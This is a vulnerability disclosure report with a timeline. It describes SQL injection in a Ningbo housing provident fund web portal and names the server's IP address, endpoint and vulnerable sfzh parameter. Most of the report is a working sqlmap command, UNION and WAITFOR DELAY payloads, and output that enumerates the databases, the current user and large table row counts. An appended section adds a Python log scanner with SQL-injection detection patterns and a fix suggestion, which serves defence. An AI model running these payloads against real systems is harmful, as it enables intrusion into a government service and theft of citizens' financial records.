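2014-03-23: Details reported to the vendor; awaiting vendor handling
2014-03-28: Vendor confirmed; details disclosed to the vendor only
2014-04-07: Details disclosed to core white hats and relevant domain experts
2014-04-17: Details disclosed to regular white hats
2014-04-27: Details disclosed to intern white hats
2014-05-07: Details disclosed to the public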
SQL injection in a city's housing provident fund management platform
Ningbo Housing Provident Fund Management Center, Yuyao Branch
http://221.136.78.209:7001/wscx/
Injection point:
http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin
The sfzh parameter is vulnerable to SQL injection.
sqlmap.py -u "http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin" --current-db --current-user --dbs
---
Place: GET
Parameter: sfzh
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: password=123456&sfzh=admin' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(121)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(65)+CHAR(76)+CHAR(119)+CHAR(72)+CHAR(118)+CHAR(115)+CHAR(90)+CHAR(118)+CHAR(100)+CHAR(87)+CHAR(113)+CHAR(104)+CHAR(102)+CHAR(109)+CHAR(113)--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: password=123456&sfzh=admin' WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Sybase
current user: 'jtpsoftadmin'
current database: 'gjjmx12'
available databases [7]:
[*] gjjmx12
[*] gjjmx12_zgkl
[*] master
[*] model
[*] sybsystemdb
[*] sybsystemprocs
[*] tempdb
sqlmap.py -u "http://221.136.78.209:7001/wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=admin" --count
Database: gjjmx12_zgkl
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.gzzgklk                | 41626   |
| dbo.bm_glyyh               | 1       |
+----------------------------+---------+

Database: sybsystemprocs
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.spt_server_info        | 30      |
| dbo.spt_datatype_info      | 27      |
| dbo.spt_jdatatype_info     | 27      |
| dbo.spt_datatype_info_ext  | 9       |
+----------------------------+---------+

Database: master
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.syblicenseslog         | 1843    |
| dbo.spt_values             | 1711    |
| dbo.spt_mda                | 186     |
| dbo.spt_ijdbc_mda          | 175     |
| dbo.jdbc_function_escapes  | 89      |
| dbo.ijdbc_function_escapes | 88      |
| dbo.spt_ijdbc_conversion   | 20      |
| dbo.spt_jdbc_conversion    | 20      |
| dbo.spt_limit_types        | 4       |
| dbo.spt_ijdbc_table_types  | 3       |
| dbo.spt_jdbc_table_types   | 3       |
| dbo.spt_jtext              | 1       |
| dbo.spt_monitor            | 1       |
+----------------------------+---------+

Database: gjjmx12
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.gzhkk                  | 610733  |
| dbo.gzbjk                  | 424578  |
| dbo.gzpzk                  | 116074  |
| dbo.gzjbk                  | 61715   |
| dbo.gzzqk                  | 35066   |
| dbo.gzshk                  | 22439   |
| dbo.gzdkk                  | 14975   |
| dbo.module_func            | 320     |
| dbo.menu_item              | 254     |
| dbo.tmp_dsr                | 114     |
| dbo.gzlsk                  | 18      |
| dbo.bm_hkfs                | 9       |
| dbo.gzllk                  | 6       |
| dbo.app_role               | 3       |
| dbo.user_role              | 3       |
| dbo.app_user               | 2       |
| dbo.bm_a005                | 2       |
| dbo.gzndk                  | 1       |
+----------------------------+---------+
Security testing only; the database was absolutely not dumped.
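For defenders reviewing access logs for this endpoint, the following added example (not part of the original report) flags requests whose sfzh or password value carries the two techniques shown in the sqlmap output above. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the two techniques reported in the sqlmap output above,
# plus the string-literal breakout (') that both payloads start with.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time-based": re.compile(r"\bwaitfor\s+delay\s+'\d+:\d+:\d+'", re.I),
    "quote-breakout": re.compile(
        r"'\s*(--|;|\b(or|and|union|waitfor)\b)", re.I),
}
# Assumed combined-log-style request field: "METHOD URL HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation addresses, shortened payloads).
PREFIX = ('198.51.100.7 - - [23/Mar/2014:10:00:0%d +0800] '
          '"GET /wscx/zfbzgl/zfbzsq/login_hidden.jsp?password=123456&sfzh=')
SAMPLE_LOG = [
    PREFIX % 1 + 'admin HTTP/1.1" 200 512',
    PREFIX % 2 + 'admin%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20'
                 ' HTTP/1.1" 200 640',
    PREFIX % 3 + 'admin%27+WAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 512',
]

def classify(value):
    """Return the sorted names of signatures matching a decoded value."""
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(value))

def scan(lines, watched=("sfzh", "password")):
    """Return (line_no, param, hits) for each suspicious watched parameter."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl URL-decodes, so %27 and '+' are normalised before matching.
        for name, value in parse_qsl(query, keep_blank_values=True):
            hits = classify(value) if name in watched else []
            if hits:
                findings.append((no, name, hits))
    return findings

if __name__ == "__main__":
    for no, name, hits in scan(SAMPLE_LOG):
        print(f"line {no}: parameter {name} matched {', '.join(hits)}")
```

Log matching only helps with detection; the fix for the page itself is to bind sfzh and password as query parameters instead of concatenating them into the SQL string.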
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-03-28 15:14
None yet